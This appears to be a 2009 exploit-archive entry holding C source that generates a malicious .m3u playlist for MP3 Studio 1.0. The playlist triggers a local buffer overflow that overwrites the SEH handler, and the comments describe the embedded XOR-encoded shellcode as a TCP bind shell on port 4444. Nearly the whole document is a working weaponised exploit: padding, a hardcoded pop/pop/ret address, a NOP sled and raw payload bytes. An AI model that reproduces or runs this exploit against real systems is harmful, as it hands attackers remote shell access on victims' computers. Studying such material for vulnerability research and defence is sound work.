
# Title : MP3 Studio 1.0 (.m3u File) Local Buffer Overflow Exploit
# Published : 2009-09-14
# Author : dmc


/* mplode.c vs MP3 Studio v1.0
 * Tested on: Windows 2000 SP4 (the SEH handler address used below is taken from
 * that system's ws2help.dll and must be re-located for any other build)
 *
 * Author: Dominic Chell <dmc@deadbeef.co.uk>
 *
 * PoC: http://www.milw0rm.com/exploits/9277
 * The PoC author said he could not exploit it so I decided to try.
 *
 * A bit of fun for a boring night in Peterborough :(
 * Good luck finding someone who uses this media player.
 */

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>

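/* Print the banner and command-line synopsis to stderr.
 * Wrapped in do/while(0) so the macro is a single statement and
 * survives an unbraced if/else at the call site. */
#define usage() do { \
	(void)fprintf(stderr, "MPlode vs MP3 Studio v1.0\n(C) dmc <dmc@deadbeef.co.uk>\n\nExample: mplode.exe [output file]\n"); \
} while (0)

/* Print message `e` on its own line to stderr and return -1 from the
 * calling function (only usable inside a function returning int). */
#define error(e) do { \
	(void)fprintf(stderr, "%s\n", (e)); \
	return -1; \
} while (0)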

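/* Payload: according to the original author, a TCP bind shell on port 4444.
 * The leading bytes (31 c9 83 e9 .. d9 ee d9 74 24 f4 5b 81 73 13 ..) appear
 * to be a self-decoding XOR stub, so the opcodes are not readable as-is;
 * decode or detonate in a sandbox before trusting what it actually does.
 * 344 bytes plus the string NUL terminator (sizeof == 345). */
char shellcode[] =
	"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf7"
	"\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x1f\x7b\x07\x7f"
	"\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x8f\x83\x17\x0b"
	"\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x19\xb3\x38\x19"
	"\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\xcc\xd6\xdc\xa8"
	"\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\xa8\x9e\xf9\x6b"
	"\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x7c\xc1\xc8\x0b"
	"\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\xb9\x8c\x14\xd0"
	"\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\xa8\xd6\x07\x50"
	"\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x76\x6f\xf0\x82"
	"\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x21\xd1\xab\xd3"
	"\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x91\xd1\x71\x61"
	"\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\xa2\x7d\x28\xe8"
	"\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x12\xcb\x7e\xc9"
	"\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x8e\x44\x81\xd7"
	"\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x7e\x67\x92\xd0"
	"\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x5d\x7c\xba\xad"
	"\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x09\x31\xee\x7f"
	"\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\xa6\xd3\xad\xd1"
	"\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x08\xb5\x07\x50"
	"\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x07\x08\xfc\xdf"
	"\xa4\x7d\x2e\x7f\x27\x82\xf8\x80";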

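/* SEH handler overwrite: little-endian 0x75022AC4, a pop/pop/ret in
 * ws2help.dll on the author's Windows 2000 SP4. The address is specific to
 * that DLL build and must be re-located for any other target; later Windows
 * versions also add SEH mitigations that a bare module address may not pass. */
const char *seh = "\xC4\x2A\x02\x75";

/* Overwritten "next SEH" pointer: `jmp short +0x10` plus two NOPs. The jump
 * skips over the handler address that follows it and lands in the NOP sled
 * that main() writes after the SEH record. */
const char *nextseh = "\xeb\x10\x90\x90";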

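/* Write the crafted .m3u playlist.
 *
 * argv[1] names the output file. Names longer than 14 characters fall back
 * to "mplode.m3u", as in the original tool, but now with a notice instead of
 * a silent switch. Returns 0 on success, -1 if the file cannot be opened or
 * fully written (via the error() macro).
 *
 * File layout, which the `seh`/`nextseh` values depend on:
 *   "http://" | 4103 x 'A' | nextseh (4) | seh (4) | 500 x NOP | shellcode
 */
int main(int argc, char *argv[])
{
	enum { OUTNAME_MAX = 14, PAD_LEN = 4103, SLED_LEN = 500 };
	const char *outfile = "mplode.m3u";
	FILE *fp;

	if (argc < 2) {
		usage();
		return 0;
	}

	/* The original copied at most 14 characters; keep that limit but
	 * tell the user when the default name is used instead. */
	if (strlen(argv[1]) <= OUTNAME_MAX) {
		outfile = argv[1];
	} else {
		fprintf(stderr, "[*] Output name longer than %d chars, using %s\n",
			OUTNAME_MAX, outfile);
	}

	/* Binary mode: in text mode on Windows any 0x0a byte in the payload
	 * would be rewritten as CR LF and shift every offset after it. */
	fp = fopen(outfile, "wb");
	if (!fp)
		error("[*] Cannot output file\n");

	if (fwrite("http://", 7, 1, fp) != 1)
		goto write_fail;
	for (int i = 0; i < PAD_LEN; i++) {
		if (fputc('A', fp) == EOF)
			goto write_fail;
	}
	if (fwrite(nextseh, 4, 1, fp) != 1 || fwrite(seh, 4, 1, fp) != 1)
		goto write_fail;
	for (int i = 0; i < SLED_LEN; i++) {
		if (fputc(0x90, fp) == EOF)
			goto write_fail;
	}
	/* sizeof includes the string's NUL terminator; the original wrote it
	 * too, so it is kept for byte-identical output. */
	if (fwrite(shellcode, sizeof(shellcode), 1, fp) != 1)
		goto write_fail;

	/* fclose flushes buffered data; a failure here means a short file. */
	if (fclose(fp) != 0) {
		fp = NULL;
		goto write_fail;
	}

	fprintf(stderr, "MPlode vs MP3 Studio v1.0\n(C) dmc <dmc@deadbeef.co.uk>\n\n");
	fprintf(stderr, "[*] Success, exploit written to %s\n", outfile);
	return 0;

write_fail:
	if (fp)
		fclose(fp);
	error("[*] Write failed, output file is incomplete");
}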
